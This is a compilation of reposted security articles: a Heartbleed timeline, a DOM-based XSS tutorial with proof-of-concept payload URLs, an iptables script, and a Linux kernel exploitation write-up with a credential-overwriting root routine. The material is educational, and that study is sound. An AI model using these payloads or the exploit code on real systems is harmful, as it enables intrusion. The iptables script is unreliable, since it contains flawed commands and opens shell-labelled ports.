disclosure: "We added protections for Facebook’s implementation of OpenSSL before this issue was publicly disclosed, and we're continuing to monitor the situation closely." An article on The Verge suggests Facebook got an encrypted email message from a friend in the same way CloudFlare did. Monday, April 7 08.19 - The National Cyber Security Centre Finland reports Codenomicon's OpenSSL "Heartbleed" bug to OpenSSL core team members Ben Laurie (who works for Google) and Mark Cox (Red Hat) via encrypted email. Monday, April 7 09.11 - The encrypted email is forwarded to the OpenSSL core team members, who then decide, according to Cox, that "the coincidence of the two finds of the same issue at the same time increases the risk while this issue remained unpatched. OpenSSL therefore released updated packages [later] that day." Monday, April 7 09:53 - A fix for the OpenSSL Heartbleed bug is committed to OpenSSL's Git repository (at this point private). Confirmed by Red Hat employee: "At this point it was private." Monday, April 7 10:21:29 - A new OpenSSL version is uploaded to OpenSSL's web server with the filename "openssl-1.0.1g.tgz". Monday, April 7 10:27 - OpenSSL publishes a Heatbleed security advisory on its website (website metadata shows time as 10:27 PDT). Monday, April 7 10:49 - OpenSSL issues a Heartbleed advisory via its mailing list. It takes time to get around. Monday, April 7 11:00 - CloudFlare posts a blog entry about the bug. Monday, April 7 12:23 - CloudFlare tweets about its blog post. Monday, April 7 12:37 - Google's Neel Mehta comes out of Twitter hiding to tweet about the OpenSSL flaw. Monday, April 7 13:13 - Codenomicon tweets they found bug too and link to their Heartbleed.com website. Monday, April 7 ~13:13 - Most of the world finds out about the issue through heartbleed.com. Monday, April 7 15:01 - Ubuntu comes out with patch. Monday, April 7 23.45 - The National Cyber Security Centre Finland issues a security advisory on its website in Finnish. Monday, April 8 ~00:45 - The National Cyber Security Centre Finland issues a security advisory on its website in English. Tuesday, April 9 - A Red Hat technical administrator for cloud security, Kurt Seifried, says in a public mailing list that Red Hat and OpenSSL tried to coordinate disclosure. But Seifried says things "blew up" when Codenomicon reported the bug too. "My understanding is that OpenSSL made this public due to additional reports. I suspect it boiled down to 'Group A found this flaw, reported it, and has a reproducer, and now Group B found the same thing independently and also has a reproducer. Chances are the bad guys do as well so better to let everyone know the barn door is open now rather than wait 2 more days'. But there may be other factors I'm not aware [of],” Seifried says. Wednesday, April 9 - A Debian developer, Yves-Alexis Perez, says on the same mailing list: "I think we would have managed to handle it properly if the embargo didn't break." Wednesday, April 9 - Facebook and Microsoft donate $US15,000 to Neel Mehta via the Internet Bug Bounty program for finding the OpenSSL bug. Mehta gives the funds to the Freedom of the Press Foundation. Monday, April 14 ~12.30pm - The Guardian reports a mothers forum with 1.5 million users called Mumsnets is impacted by Heartbleed. A "hacker" reportedly breached the admin's user account. Monday, April 14 - the Canada Revenue Agency announces social insurance numbers of approximately 900 taxpayers were removed from its systems by someone exploiting the Heartbleed vulnerability. Wednesday, April 16 - A Canadian teen is arrested for stealing tax data with Heartbleed. Who knew of heatbleed prior to release? Google (March 21 or prior), CloudFlare (March 31 or prior), OpenSSL (April 1), Codenomicon (April 2), National Cyber Security Centre Finland (April 3), Akamai (April 4 or earlier) and Facebook (no date given). Who knew hours before public release? SuSE, Debian, FreeBSD and AltLinux. Who didn't know until public release? Many, including Amazon Web Services, Twitter, Yahoo, Ubuntu, Cisco, Juniper, Pinterest, Tumblr, GoDaddy, Flickr, Minecraft, Netflix, Soundcloud, Commonwealth Bank of Australia (main website, not net banking website), CERT Australia website, Instagram, Box, Dropbox, GitHub, IFTTT, OKCupid, Wikipedia, Wordpress and Wunderlist. Many thanks to: Nik Cubrilovic, Yves-Alexis Perez, public mailing lists, emails with OpenSSL core team, emails with the National Cyber Security Centre Finland, Google Plus posts, and emails with people who volunteer at Linux distributions. Corrections/updates: April 15, 4.14pm AEST: Some Codenomicon dates were wrong. They have been fixed. April 16, 6.04pm AEST: Added another significant event that occured on Sunday, April 6 02:30 PDT. April 16, 9.57pm AEST: Added details about the time OpenSSL core team members found out about Heartbleed from Google. April 18, 6.18pm AEST: Added information about the Canadian tax agency breach, the Canadian teen getting arrested for it, and details from this blog post from CloudFlare. Sursa: Heartbleed disclosure timeline: who knew what and when
-
[h=2]Windows System Call and CSR API tables updated[/h] Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for 32-bit and 64-bit Intel platforms, as well as CSR API information formatted in two different ways for convenience (a list and a table). Without further ado, all of the tables now contain up-to-date data covering all operating systems available to me at the time, including Windows 8, 8.1 and Server 2012. The links are as follows:[h=3]NT system calls[/h] Windows X86 System Call Table (NT/2000/XP/2003/Vista/2008/7/8) Windows X86-64 System Call Table (NT/2000/XP/2003/Vista/2008/7/2012/8) [h=3]Win32k.sys system calls[/h] Windows WIN32K.SYS System Call Table (NT/2000/XP/2003/Vista/2008/7/8) Windows x86-64 WIN32K.SYS System Call Table (NT/2000/XP/2003/Vista/2008/7/2012/8) [h=3]CSR API calls[/h] Windows CSRSS API List (NT/2000/XP/2003/Vista/2008/7/2012/8) Windows CSRSS API Table (NT/2000/XP/2003/Vista/2008/7/2012/8) Pointers to all tables can also be found in the left pane under the “OS Structures” section. If you spot a bug in any of the tables or have any other comments, let me know. I hope you find them useful! Sursa: Windows System Call and CSR API tables updated | j00ru//vx tech blog
-
Cross Site scripting (XSS) has been a problem for well over a decade now, XSS just like other well known security issues such as SQL, XPATH, LDAP Injection etc fells inside the category of input validation attacks. An xss vulnerability occurs when an input taken from the user is not filtered/santized before it's returned back to the user. The XSS can be divided into the following three categories: 1) Reflected XSS 2) Stored XSS 3) DOM Based XSS As time has passed by the security community has came up with lots of solutions to mitigate XSS attacks such as encoding libraries, Web Application filters based upon blacklists, Browser based XSS filters, Content security policy etc, however all of them have had some limitation either not being able to mitigate xss attacks in a certain context. For example - We have a well known PHP based protection library called HTML purifier, it offers great protection against XSS attacks in lots of different context, however currently it has no support for HTML 5, talking about content security policy which dubbed as the best solution for mitigating xss attacks has no support for inline JS as well as no support for mobile browsers. However, traditional XSS has been mitigated to some extent where the input is sent to the server and when is returned without any sanitation. However what happens in case where the user input is never sent to the server side and get's executed on the client side?. In that case all the server side defenses would fail as the payload never arrives the server. This is what is referred as DOM based XSS when the payload is never sent to the server and is executed on the client side, in order to understand DOM based XSS better, we would need to understand, what's DOM. What is DOM? DOM stands for document object model and all it is a javascript's way of accessing page. Each and every HTML element has a correspoding entity inside of DOM. What is DOM Based XSS? A DOM based XSS vulnerability occurs when a source get's executed as a sink without any sanitization. A source is commonly refered as any thing that takes input, which apparentely in javascript is "Everything taken from a URL". Common sources inside javascript are document.url, location.hash, location.href, document.referer. A more detailed list is available at the DOM based XSS Wiki. A sink is refered to anything that creates HTML in an insecure way. There are wide variety of different sinks depending upon the javascript libraray you use. For example: In javascript document.write, innerHTML, eval are the most commonly found sinks, where as in jquery we have .html(), .appendto() etc. We can find a list of commonly used sinks at DOM based XSS wiki. How to find DOM Based XSS? There are couple of different approaches to detecting DOM based XSS such as black box fuzzing, static analysis and Dynamic analysis. We will discuss all three of them. Black Box Fuzzing In black box fuzzing approach, we try injecting different XSS vectors inside different javascript sources and hoping for javascript to be executed. A tool called Ra-2 is an example of blackbox fuzzing approach towards DOM based XSS. The Fundamental problem with this approach is that it's not context aware and contains several false negatives. Static Analysis Another approach is to detecting DOM based XSS is by performing a static source code analysis, where by we try finding out the sources/sinks and we trace if a source is being executed as a sink.DOM based XSS wiki contains a list of regular expressions which would help you find out the sources/sinks: The following regular expressions would help you determine all the sources and sinks in a javascript file: Finding Sources: /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog| cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage| Database)/ Finding Javascript Sinks: /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open (Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/ Finding Jquery based sinks /after\(|\.append\(|\.before\(|\.html\(|\.prepend\(|\.replaceWith\(|\.wrap\(|\.wrapAll\(|\$\(|\.globalEval\(|\.add\(| jQUery\(|\$\(|\.parseHTML\(/ JSprime and IBM appscan apply this particular approach to detecting DOM based XSS. The fundamental problem with this approach is that javascript code may be compressed, packed or Obfuscated, in that scenario Static analysis won't help us. Also in case where the code is encoded and is decsoded and executed at runtime a static code analyzer won't be able to detect it. An example of this would be the following statement: eval('var a'+'=loc'+'ation'+'.hash'); The strings would are spilitted and would be joined together in memory at runtime and would be executed by using the eval function. Dynamic Analysis As mentioned above, a static code analyzer won't be able to detect obfuscated and code which would execute at the run-time. In that case, we have another approach called as Dynamic taint tracking. The taint flag is added to the source and it's tracked until it is executed via a source at run-time. Dominator is currently the only tool in the market that utilizes this methodology, however there are several places where dominator is not effective 1) Human interaction is necessary for the analysis to be performed. 2) If a human misses to test a feature dominator would also miss. 3) A better dynamic taint tracking is required. Let's now talk about few examples: Example: <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to our system … </HTML> The following code is taken from Amiet klien's paper on "DOM based XSS", In the above script we see a javascript source document.url that takes input from a url, The indexof property searches for the name parameter inside the url and is saved into the "pos" variable, later the user input stored inside the pos variable is being directly written to the DOM without any sanitization. By inserting the following payload, javascript would be executed and hence would finalize the DOM based XSS attack: http://www.target.com/page?name=<script>alert(1);</script> In the above case one might argue that the payload would be sent to the server in initial requests, but in the following scenario where we specify a hash before the name variable, the payload would not be sent to the server. http://www.target.com/page?#name=<script>alert(1);</script> Let's take a look at another example: <html> <body> <h2>POC for settimeout DOMXSS</h2> <body> <script> var i=location.hash.split('#')[1]; (function () { setTimeout(i,3000); })(); </script> </body> </html> In this case, the source is location.hash, the split function is used which would split up everything after hash, the user input is being stored under variable "i" which is later executed via setTimeout() function which is a known javascript sink. The following would trigger an alert after three seconds: http://www.target.com/page.html#alert(1) Example 3 <script> var redir = location.hash.split("#")[1]; x = document.getElementById('anchor'); x.setAttribute('href',redir); </script> The following is another very simple example of DOM based XSS, the input is taken from location.hash and is stored inside redir variable. Next, we use getElementByID method to search for anchor element with id "anchor". next the value of redir is assigned to the href attribute via the setAttribute API. The sink in this case is the href. You may try replacing href with src and it would still result in the javascript being executed. Cross Browser Detection Some browsers encode special characters when taken from a particular before displaying it back to the DOM and due to this reason a DOM based XSS vulnerability might trigger in one browser, but does not trigger in another browser. For example: Firefox encodes every thing sent after ?, where as internet explorer doesn't. A list of these characters is already compiled up on DOM based XSS wiki. Consider, Spending some time reviewing it. https://code.google.com/p/domxsswiki/wiki/LocationSources Defending Against DOM Based XSS The following steps shall be taken to mitigate DOM based XSS attacks 1) Unsafe sinks shall not be used. They shall be replaced with safe methods. For example: innerHTML is classified as a dangerous sink, however innertext could be used in place of innerHTML, which is a safe DOM method. Similarly in jquery, .html() (equivalent to innerHTMLof javascript) is classified as a dangerous method, alternatively we have .text() method to safely write things to the DOM. 2) As there are several different javascript libraries, community should make effort in classifying all the dangerous sinks in that particular libraray and introduce safe methods This concludes the introductory post on DOM based XSS, Stay tuned for the part 2. Sursa: DOM XSS Explained - Part 1 | Learn How To Hack - Ethical Hacking and security tips
-
ABSTRACT Readers, there are numerous reasons ... It is well known that the Internet is an unmanaged an decentralized network, running under a set of protocols, which are not designed to ensure the integrity and confidentiality of information and access controls. There are several ways to breach a network, but these ways do nothing more than take advantage of flaws within network protocols and services. CONCEPTS IPTABLES is an editing tool for packet filtering, with it you can analyze the header and make decisions about the destinations of these packets, it is not the only existing solution to control this filtering. We still have the old ipfwadm and ipchains, etc. It is important to note that in Gnu / Linux, packet filtering is built into the kernel. Why not configure your installation in accordance with this article, since most distributions come with it enabled as a module or compiled directly into the kernel. STEP BY STEP case "$1" in start) Clearing Rules iptables -t filter -F iptables -t filter -X Tips [ICMP ECHO-REQUEST] messages sent to broadcast or multicast echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts Protection against ICMP redirect request echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects Do not send messages, ICMP redirected. echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects (Ping) ICMP iptables -t filter -A INPUT -p icmp -j ACCEPT iptables -t filter -A OUTPUT -p icmp -j ACCEPT Packages logs with nonexistent addresses (due to wrong routes) on your network echo 1 > /proc/sys/net/ipv4/conf/all/log_martians Enabling forwarding packets (required for NAT) echo "1" >/proc/sys/net/ipv4/ip_forward SSH accepted iptables -t filter -A INPUT -p tcp --dport 22 -j ACCEPT Do not break established connections iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT Block all connections by default iptables -t filter -P INPUT DROP iptables -t filter -P FORWARD DROP iptables -t filter -P OUTPUT DROP IP spoofing protection echo "1" > /proc/sys/net/ipv4/conf/default/rp_filter echo - Subindo proteção contra ip spoofing : [OK] Disable sending the IPV4 echo 0 > /proc/sys/net/ipv4/ip_forward SYN-Flood Protection iptables -N syn-flood iptables -A syn-flood -m limit --limit 10/second --limit-burst 50 -j RETURN iptables -A syn-flood -j LOG --log-prefix "SYN FLOOD: " iptables -A syn-flood -j DROP # Loopback iptables -t filter -A INPUT -i lo -j ACCEPT iptables -t filter -A OUTPUT -o lo -j ACCEPT Tips connections scans iptables -A INPUT -m recent --name scan --update --seconds 600 --rttl --hitcount 3 -j DROP iptables -A INPUT -m recent --name scan --update --seconds 600 --rttl --hitcount 3 -j LOG --log-level info --log-prefix "Scan recent" Tips SYN packets invalid iptables -A INPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP iptables -A INPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected" iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected" iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-level info --log-prefix "Packages SYN Detected" # Tips SYN packets invalid iptables -A OUTPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP iptables -A OUTPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP iptables -A OUTPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP iptables -A INPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected" iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected" iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-level info --log-prefix "Packages SYN Detected" Certifies that new packets are SYN, otherwise they Tips iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP Discard packets with fragments of entry. Attack that can cause data loss iptables -A INPUT -f -j DROP iptables -A INPUT -f -j LOG --log-level info --log-prefix "Packages fragmented entries" Tips malformed XMAS packets iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP iptables -A INPUT -p tcp --tcp-flags ALL ALL -j LOG --log-level info --log-prefix "malformed XMAS packets" DNS In/Out iptables -t filter -A OUTPUT -p tcp --dport 53 -j ACCEPT iptables -t filter -A OUTPUT -p udp --dport 53 -j ACCEPT iptables -t filter -A INPUT -p tcp --dport 53 -j ACCEPT iptables -t filter -A INPUT -p udp --dport 53 -j ACCEPT NTP Out iptables -t filter -A OUTPUT -p udp --dport 123 -j ACCEPT WHOIS Out iptables -t filter -A OUTPUT -p tcp --dport 43 -j ACCEPT FTP Out iptables -t filter -A OUTPUT -p tcp --dport 20:21 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 30000:50000 -j ACCEPT FTP In iptables -t filter -A INPUT -p tcp --dport 20:21 -j ACCEPT iptables -t filter -A INPUT -p tcp --dport 30000:50000 -j ACCEPT iptables -t filter -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT HTTP + HTTPS Out iptables -t filter -A OUTPUT -p tcp --dport 80 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 443 -j ACCEPT HTTP + HTTPS In iptables -t filter -A INPUT -p tcp --dport 80 -j ACCEPT iptables -t filter -A INPUT -p tcp --dport 443 -j ACCEPT Mail SMTP:25 iptables -t filter -A INPUT -p tcp --dport 25 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 25 -j ACCEPT Mail POP3:110 iptables -t filter -A INPUT -p tcp --dport 110 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 110 -j ACCEPT Mail IMAP:143 iptables -t filter -A INPUT -p tcp --dport 143 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 143 -j ACCEPT # Reverse iptables -t filter -A INPUT -p tcp --dport 77 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 77 -j ACCEPT MSF iptables -t filter -A INPUT -p tcp --dport 7337 -j ACCEPT iptables -t filter -A OUTPUT -p tcp --dport 7337 -j ACCEPT ####################################### WEB Management Firewall touch /var/log/firewall chmod +x /var/log/firewall /var/log/firewall -A INPUT -p icmp -m limit --limit 1/s -j LOG --log-level info --log-prefix "ICMP Dropped " /var/log/firewall -A INPUT -p tcp -m limit --limit 1/s -j LOG --log-level info --log-prefix "TCP Dropped " /var/log/firewall -A INPUT -p udp -m limit --limit 1/s -j LOG --log-level info --log-prefix "UDP Dropped " /var/log/firewall -A INPUT -f -m limit --limit 1/s -j LOG --log-level warning --log-prefix "FRAGMENT Dropped " /var/log/firewall -A INPUT -m limit --limit 1/minute --limit-burst 3 -j LOG --log-level DEBUG --log-prefix "IPT INPUT packet died: " /var/log/firewall -A INPUT -m limit --limit 3/minute --limit-burst 3 -j LOG --log-level DEBUG --log-prefix "IPT INPUT packet died: " exit 0 ;; stop) echo "turning off the firewall " iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -t filter -F exit 0 ;; restart) /etc/init.d/firewall stop /etc/init.d/firewall start ;; echo "Use: /etc/init.d/firewall {start|stop|restart}" exit 1 ;; esac Logs available: /var/log/firewall COMMANDS TO MONITOR LOGS: tail -f /var/log/messages Save: /etc/init.d/firewall CONCLUSION Gentlemen, I hope to help you in configuring your network security and remind you to choose only the best options available. Allow me to add a few Advantages of using your firewall. Be sure to Block unknown and unauthorized connections. You can specify what types of network protocols and services to be provided and you may control the packets from any untrusted services. Your firewall also allows blocking websites with URL filters, access control, access logs for reports by user, protecting the corporate network through proxies, and Automatic Address Conversion (NAT). Control services that can either be executed or not, on the network allowing for high performance in their duties with easy administration and reliability. Sursa: A Beginners Guide To Using IPTables | Learn How To Hack - Ethical Hacking and security tips
-
Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters Last month i was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architecture" as a semester project. I was particularly interested in writing security related stuff, let it be related to computer architecture, networks etc. However i found that lots of work has already been done on the architecture level security. Therefore, i convinced my teacher that i'll be writing on "Bypassing Modern Web Application Firewall's" as some of you might know that most of my research is related to client side vulnerabilities and bypassing WAF's. In my day to day job as a penetration tester, it's very often that i encounter a web application firewall/filter that looks for malicious traffic inside the http request and filters it out, some of them are easy to break and some of them are very hard. However, in one or another context all the WAF's i have encountered are bypassable at some point. Rsnake's XSS cheat sheet was one of the best resources available for bypassing WAF's, however overtime as browsers got updated lots of the vectors didn't work on the newer browser. Therefore there was a need to create a new Cheat Sheet. Over time i have developed my own methodology for bypassing WAF's and that's what i have written the paper on. The paper talks specifically about bypassing XSS filters, as for SQLi, RCE etc. I thought to write a different paper as the techniques differ in many cases. Download: WAF_Bypassing_By_RAFAYBALOCH Sursa: Bypassing Modern WAF's XSS Filters - Cheat Sheet | Learn How To Hack - Ethical Hacking and security tips
-
[h=3]December HZV Meet : Linux Kernel Exploitation [/h]Hello, So, last Saturday, I did a talk about Linux Kernel Exploitation. I went over some well known vulnerabilities and I ended with a demo on a kernel exploitation challenge (here) by Jason Donenfeld (his site). The slides are at the end of this blog article. In this post, I will detail a bit more some of the slides in the talk. I will not detail every single slides, only the ones where I think there isn't enough details. If you don't understand some things, don't hesitate to comment . So, let's dig in. [h=2]Linux Kernel[/h] The kernel has LOTS of code. 15+ millions lines of code. LOTS of code mean complexity, complexity mean bugs and bugs mean potential vulnerabilities . Anyhow, the main gateway for users to interact with the kernel are syscalls and IOCTLs. Behind a syscall, especially network ones, there is a TONS of code. Effectively, for a bind() call, you have the same interface right? Well, the kernel, find the corresponding structure using the socket descriptor you use with your bind call. In that structure, there is what is called a struct proto_ops which contains callbacks for the corresponding protocol. [h=2]Exploiting the Linux Kernel[/h] The Linux Kernel is made of code, it is software. And everyone do know that software has bugs and vulnerabilities. The Linux Kernel is not an exception. You will mostly find all the vulnerabilities you know from userland: - stack based buffer overflows - heap based buffer overflows - race conditions - integer signedness issues - information leaks - initialisation issues - etc And some different ones: - NULL Pointer Dereference - stack overflow (real ones, not based on) - process manipulation tricks (mempodipper) - etc __copy_to_user() and copy_to_user() are not the same. The first one doesn't check that the address effectively live in userland while the second one do that. The goal of exploiting the kernel is mainly to get root. [h=2]NULL Pointer Dereference[/h]It was (is?) exploitable in kernel simply because you could (can?) map the NULL page in your exploit as it lives in userland. As such, it doesn't crash. [h=2]Heuristics[/h] These are routines that allow you to have good enough approximations. For instance, before 2.6.29, credentials were stored like this in the kernel: /*Kernel 2.6.23 include/linux/sched.h */ struct task_struct { /* ... */ /* process credentials */ uid_t uid,euid,suid,fsuid; gid_t gid,egid,sgid,fsgid; struct group_info *group_info; kernel_cap_t cap_effective, cap_inheritable, cap_permitted; unsigned keep_capabilities:1; struct user_struct *user; /* ... */ }; As you can see, uid, euid and suid will generally have the same value. So if you set thos values to 0, your process basically has root privileges. This heuristic is good enough as there is little chance that you will have 3 dwords with the same values in memory (don't forget we start to search from our current task_struct that represent our exploit process). This routine before 2.6.29 was thus enough to get root: // get root before 2.6.29 kernelvoid get_root_pre_2_6_29 (void) { uid_t uid, *cred; size_t byte; uid = getuid(); cred = get_task_struct(); if (!cred) return; for (byte = 0; byte < PAGE_SIZE; byte++) { if (cred[0] == uid && cred[1] == uid && cred[2] == uid) { cred[0] = cred[1] = cred[2] = cred[3] = 0; cred[4] = cred[5] = cred[6] = cred[7] = 0; } cred++; } } [h=2]Root in 3 big steps[/h]You've basically got 3 big steps: prepare, trigger vulnerability, trigger payload. [h=3]Prepare[/h] This is the most important step as this will greatly affect the reliability of your exploit. This is where you: - check that the kernel is vulnerable. - use information leaks - prepare the memory layout so you can predict reliably where your objects are - place your shell code in memory The avantage of shellcoding in the kernel : it is in C. [h=3]Trigger vulnerability[/h] This is where you will exploit your vulnerability. Patching memory, pointers and whatsoever. [h=3]Trigger payload[/h] This is where you escalate the privileges of your process. This is also where you fix the mayhem you may have caused earlier. It is REALLY important to fix the things you messed up as otherwise the machine may crash later. It is done in the payload as the payload is executed in kernel mode. root is in userland, root != kernel land, don't get confused about that. After triggering the payload, you go back in userland and spawn your root shell or whatsoever. Ok, now that you have the basic understanding, you are ready for some kernel goodies. [h=2]Linux Kernel Exploitation[/h]I won't explain CVE-2009-2692 unless some people ask for it. It is simple enough using the slides to comprehend. Anyhow, let's dig in TUN NULL Pointer Dereference. [h=3]TUN NULL Pointer Dereference[/h]This vulnerability is really interesting as there is something really special about it : the vulnerability is NOT in the source code. It is inserted at compilation. Basically, what happens is that tun is dereferenced before checking that tun is NULL. As such, GCC considers that the pointer doesn't need checking as we use it before checking : GCC removes the NULL check. Boom, vulnerability. The vulnerable code: static unsigned int tun_chr_poll(struct file *file, poll_table * wait){ struct tun_file *tfile = file->private_data; struct tun_struct *tun = __tun_get(tfile); struct sock *sk = tun->sk; unsigned int mask = 0; if (!tun) return POLLERR; /* ... */ if (sock_writeable(sk) || (!test_and_set_bit(SOCK_ASYNC_NOSPACE, &sk->sk_socket->flags) && sock_writeable(sk))) mask |= POLLOUT | POLLWRNORM; /* ... */ return mask; } o the NULL check doesn't exist and tun is NULL. So we can map the NULL page and we thus control tun->sk. We control sk->sk_socket->flags as well. test_and_set_bit() set the last bit at 1. Bang, we can set any NULL pointer to 1. In the exploit, mmap() is chosen as the TUN device doesn't have a mmap(). mmap() need to be see to one even though we control the NULL page as internally mmap() is not called if it's NULL. Put a trampoline at address 1 to jump over all the junk you've set up and go to your payload. And that it's, you've escalated your privileges. [h=4]Why mmap() can't be NULL?[/h] If you dig around in the kernel, here is what to look for: // arch/x86/kernel/sys_x86_64.c:21: asmlinkage long sys_mmap(unsigned long addr, unsigned long len,asmlinkage long sys_mmap(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long fd, unsigned long off) { long error; struct file *file; error = -EINVAL; if (off & ~PAGE_MASK) goto out; error = -EBADF; file = NULL; flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE); if (!(flags & MAP_ANONYMOUS)) { file = fget(fd); if (!file) goto out; } down_write(¤t->mm->mmap_sem); error = do_mmap_pgoff(file, addr, len, prot, flags, off >> PAGE_SHIFT); up_write(¤t->mm->mmap_sem); if (file) fput(file); out: return error; } If you go down do_mmap_pgoff(), you end up finding this code: // mm/mmap.c/* ... */ if (!file->f_op || !file->f_op->mmap) return -ENODEV; break; /* ... */ So here it is, if mmap() is NULL, it doesn't get called. That is why it sets the mmap() pointer to 1. [h=2]Other exploits[/h]This is where it gets pretty hard to explain as there is still tons of code to read x). I dug a bit in vmsplice, RDS and perf_events exploits. vmsplice use buffer overflow, but it's not a common one as it doesn't overwrite any function or return pointers. What it overwrites are compound page addresses (values we don't control) and then call a dtor pointer the attacker control. Privileged code execution is gained in put_compound_page() through the call of a destructor function pointer that we control. This dtor pointer obviously points to the attacker payload. At the end of the article, I've attached some analysis I did for vmsplice. There is lot of code to cover though so I won't detail it in this post. I haven't thoroughly analyzed the RDS exploit yet but it is a write-what-where. The perf_events exploit is really interesting. It 'basically' increment a INT handler pointer upper bytes in 64 bits so the pointer end up in userland. The exploit then return to this allocated memory containing the payload. The exploit also use a neat trick to compute the perf_event array. An entire post is necessary as well to properly understand this exploit. Analysis have already been done anyhow by other people. [h=2]The challenge[/h] The VM is a 64 Bit Linux system made especially by Jason Donenfeld (aka zx2c4). The vulnerability allows us to write a 0 anywhere in kernel memory. As such, in my exploit, I zeroed out some part of a proto_ops function pointer. mmap() it, put my payload over there, jump to it and fix it. I debugged the exploit using registry information showed when the exploit crashed. The exploit is included in the archive below. [h=2]Conclusion[/h]As you can see, kernel exploitation has some similitudes with userland exploitation. The differences mainly stem in the protections and the impact that a bug can have. For instance, in kernel-land, not initializing a structure fully can have severe consequence (code execution through NULL pointer dereference, etc) while in userland, it may cause an infoleak but not directly code execution. Moreover, this also shows that the kernel is piece of software and is as such exploitable. Hope you enjoyed the article, I welcome any feedback on it, Cheers, m_101 [h=2]References[/h] - The slides : here - Jason Donenfield's challenge : here - sgrakkyu's blog : kernelbof - Attacking the Core : Kernel Exploiting Note - "A Guide to Kernel Exploitation: Attacking the Core" de Enrico Perla et Massimiliano Oldani - Miscellaneous exploits : NULL deref sendpage, NULL deref /dev/net/tun, vmsplice, RDS write-what-where, integer problem perf_swevent - MISC explaining perf_swevent exploit : Misc 69 Sursa: Binary world for binary people : December HZV Meet : Linux Kernel Exploitation
-
[h=3]Unusual 3G/4G Security: Access to a Backhaul Network[/h]A backhaul network is used to connect base stations (known as NodeB in 3G terminology) to a radio network controller (RNC). Connection costs for base stations comprise a significant part of provider's total expenses, so it is reasonable to reduce costs related to building and running of such networks, in particular by implementing new technologies. Evolution made the trip from ATM connections to SDH/SONET, DSL, IP/MPLS and metro Ethernet. Today traffic is communicated through IP packets. When a large metro network is given, we just can't use it for base stations connection only. So then it provides channels to legal entities and in some areas it provides home users with Internet access. A converged network as it is. And security is a pressing issue when it comes to converged networks. Voice and GPRS packet data are transmitted in an encrypted form over the network section between a NodeB and an RNC. But what about management traffic? What protocols are used to manage the NodeB directly? Due to the choice of a provider, it may be HTTP/HTTPS, Telnet/SSH, as well as different types of MML (a man-machine language). Unfortunately, protocols that do not encrypt data are often used to manage network elements. What happens if an intruder gets access to a network segment? Is he able to capture data in this case? How will he do it? At present, each device has an IP management interface and an Ethernet port to connect to a network. Base stations are no exception. Upon intrusion into a network, an attacker can use common ARP spoofing to catch data that technicians use to manage network devices. An example of an MML session shows how simple it is. As you go further, you will understand it really is a problem. After getting access to one base station, it is possible to break into other stations, since management IP addresses are freely routed at least within one network. Note: a mobile provider has hundreds of base stations in each city. What if it loses connection with one of the stations or has to execute works on site? For these purposes, there is a local account on a device. Such an account is usually equal for all devices, which means that an intruder can get control over hundreds of devices. A telephone network used to be an extremely isolated and controlled system. It seems that times have changed. The question is, whether telecommunication companies realize that. Author: Dmitry Kurbatov, Positive Research Sursa: Positive Research Center: Unusual 3G/4G Security: Access to a Backhaul Network
-
